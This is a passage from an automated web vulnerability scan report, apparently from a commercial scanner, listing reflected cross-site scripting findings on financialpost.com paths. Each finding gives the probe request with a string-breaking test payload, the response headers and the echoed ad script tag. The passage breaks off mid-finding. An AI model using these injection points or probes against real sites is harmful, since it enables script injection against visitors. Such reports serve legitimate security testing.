<script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/markets/news16774';529b04d3c55/index;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=markets;kw=news16774';529b04d3c55;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTag+'ord=50388801?">
...[SNIP]...

1.153. http://www.financialpost.com/markets/portfolio/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.financialpost.com
Path:   /markets/portfolio/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload fd1f9'%3b8cef738f732 was submitted in the REST URL parameter 1. This input was echoed as fd1f9';8cef738f732 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /marketsfd1f9'%3b8cef738f732/portfolio/ HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;

Response (redirected)

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Expires: Sun, 19 Dec 2010 03:08:53 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:08:53 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 36555


...[SNIP]...
<script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/marketsfd1f9';8cef738f732/portfolio/index;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=marketsfd1f9';8cef738f732;kw=portfolio;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTag+'ord=67194293?">
...[SNIP]...

1.154. http://www.financialpost.com/markets/portfolio/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.financialpost.com
Path:   /markets/portfolio/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6b4b8'%3b7f13b8163b5 was submitted in the REST URL parameter 2. This input was echoed as 6b4b8';7f13b8163b5 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /markets/portfolio6b4b8'%3b7f13b8163b5/ HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;

Response (redirected)

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Expires: Sun, 19 Dec 2010 03:09:01 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:09:01 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 43336


...[SNIP]...
<script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/markets/portfolio6b4b8';7f13b8163b5/index;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=markets;kw=portfolio6b4b8';7f13b8163b5;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTag+'ord=65828211?">
...[SNIP]...

1.155. http://www.financialpost.com/markets/results/index.html [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.financialpost.com
Path:   /markets/results/index.html

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 649ce'%3b4439dbc4f71 was submitted in the REST URL parameter 1. This input was echoed as 649ce';4439dbc4f71 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /markets649ce'%3b4439dbc4f71/results/index.html HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;

Response

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Expires: Sun, 19 Dec 2010 03:09:13 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:09:13 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 43332


...[SNIP]...
<script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/markets649ce';4439dbc4f71/results/index;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=markets649ce';4439dbc4f71;kw=results;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTag+'ord=79878026?">
...[SNIP]...

1.156. http://www.financialpost.com/markets/results/index.html [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.financialpost.com
Path:   /markets/results/index.html

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 71eb2'%3bf1a79b216fd was submitted in the REST URL parameter 2. This input was echoed as 71eb2';f1a79b216fd in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /markets/results71eb2'%3bf1a79b216fd/index.html HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;

Response

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Expires: Sun, 19 Dec 2010 03:09:19 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:09:19 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 36478


...[SNIP]...
<script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/markets/results71eb2';f1a79b216fd/index;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=markets;kw=results71eb2';f1a79b216fd;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTag+'ord=67421828?">
...[SNIP]...

1.157. http://www.financialpost.com/markets/results/index.html [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.financialpost.com
Path:   /markets/results/index.html

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 82fca'%3b5879819d15f was submitted in the REST URL parameter 3. This input was echoed as 82fca';5879819d15f in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /markets/results/82fca'%3b5879819d15f HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;

Response (redirected)

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
p3p: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Expires: Sun, 19 Dec 2010 03:09:28 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:09:28 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 43338


...[SNIP]...
<script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/markets/results/82fca';5879819d15f/index;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=markets;kw=results;kw=82fca';5879819d15f;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTag+'ord=95347973?">
...[SNIP]...

1.158. http://www.financialpost.com/markets/watchlist/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.financialpost.com
Path:   /markets/watchlist/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3b104'%3bd58474cdcee was submitted in the REST URL parameter 1. This input was echoed as 3b104';d58474cdcee in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /markets3b104'%3bd58474cdcee/watchlist/ HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;

Response (redirected)

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Expires: Sun, 19 Dec 2010 03:09:16 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:09:16 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 43371


...[SNIP]...
<script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/markets3b104';d58474cdcee/watchlist/index;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=markets3b104';d58474cdcee;kw=watchlist;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTag+'ord=21285991?">
...[SNIP]...

1.159. http://www.financialpost.com/markets/watchlist/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.financialpost.com
Path:   /markets/watchlist/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c584d'%3b08f996d92a7 was submitted in the REST URL parameter 2. This input was echoed as c584d';08f996d92a7 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /markets/watchlistc584d'%3b08f996d92a7/ HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;

Response (redirected)

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
p3p: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Expires: Sun, 19 Dec 2010 03:09:31 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:09:31 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 43336


...[SNIP]...
<script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/markets/watchlistc584d';08f996d92a7/index;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=markets;kw=watchlistc584d';08f996d92a7;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTag+'ord=81614395?">
...[SNIP]...

1.160. http://www.financialpost.com/markets/watchlist/index.html [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.financialpost.com
Path:   /markets/watchlist/index.html

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 31b1d'%3bb196f6b29d6 was submitted in the REST URL parameter 1. This input was echoed as 31b1d';b196f6b29d6 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /markets31b1d'%3bb196f6b29d6/watchlist/index.html HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;

Response

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Expires: Sun, 19 Dec 2010 02:58:19 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 02:58:19 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 43372


...[SNIP]...
<script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/markets31b1d';b196f6b29d6/watchlist/index;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=markets31b1d';b196f6b29d6;kw=watchlist;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTag+'ord=37324735?">
...[SNIP]...

1.161. http://www.financialpost.com/markets/watchlist/index.html [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.financialpost.com
Path:   /markets/watchlist/index.html

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a46f1'%3ba08a2ab8328 was submitted in the REST URL parameter 2. This input was echoed as a46f1';a08a2ab8328 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /markets/watchlista46f1'%3ba08a2ab8328/index.html HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;

Response

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
p3p: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Expires: Sun, 19 Dec 2010 02:58:25 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 02:58:25 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 43336


...[SNIP]...
<script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/markets/watchlista46f1';a08a2ab8328/index;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=markets;kw=watchlista46f1';a08a2ab8328;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTag+'ord=97147485?">
...[SNIP]...

1.162. http://www.financialpost.com/markets/watchlist/index.html [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.financialpost.com
Path:   /markets/watchlist/index.html

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a2418'%3bce201111d5b was submitted in the REST URL parameter 3. This input was echoed as a2418';ce201111d5b in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /markets/watchlist/a2418'%3bce201111d5b HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;

Response (redirected)

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Expires: Sun, 19 Dec 2010 02:58:51 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 02:58:51 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 43380


...[SNIP]...
<script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/markets/watchlist/a2418';ce201111d5b/index;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=markets;kw=watchlist;kw=a2418';ce201111d5b;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTag+'ord=79076285?">
...[SNIP]...

1.163. http://www.financialpost.com/most-popular/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.financialpost.com
Path:   /most-popular/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7f208'%3b0c5a12752b was submitted in the REST URL parameter 1. This input was echoed as 7f208';0c5a12752b in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /most-popular7f208'%3b0c5a12752b/ HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;

Response (redirected)

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Expires: Sun, 19 Dec 2010 03:16:24 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:16:24 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 36386


...[SNIP]...
<script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/most-popular7f208';0c5a12752b/index;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=most-popular7f208';0c5a12752b;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTag+'ord=56980233?">
...[SNIP]...

1.164. http://www.financialpost.com/news/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.financialpost.com
Path:   /news/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8a535'%3b42bfa164203 was submitted in the REST URL parameter 1. This input was echoed as 8a535';42bfa164203 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /news8a535'%3b42bfa164203/ HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;

Response (redirected)

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Expires: Sun, 19 Dec 2010 03:10:16 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:10:16 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 36240


...[SNIP]...
<script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/news8a535';42bfa164203/index;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=news8a535';42bfa164203;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTag+'ord=90856130?">
...[SNIP]...

1.165. http://www.financialpost.com/news/FP500/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.financialpost.com
Path:   /news/FP500/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3c300'%3bc784a23242d was submitted in the REST URL parameter 1. This input was echoed as 3c300';c784a23242d in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /news3c300'%3bc784a23242d/FP500/ HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;

Response (redirected)

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Expires: Sun, 19 Dec 2010 03:10:34 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:10:34 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 37381


...[SNIP]...
<script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/news3c300';c784a23242d/fp500/index;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=news3c300';c784a23242d;kw=fp500;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTag+'ord=54857449?">
...[SNIP]...

1.166. http://www.financialpost.com/news/FP500/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.financialpost.com
Path:   /news/FP500/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f5c6d'%3bfe08f537a24 was submitted in the REST URL parameter 2. This input was echoed as f5c6d';fe08f537a24 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /news/FP500f5c6d'%3bfe08f537a24/ HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;

Response (redirected)

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
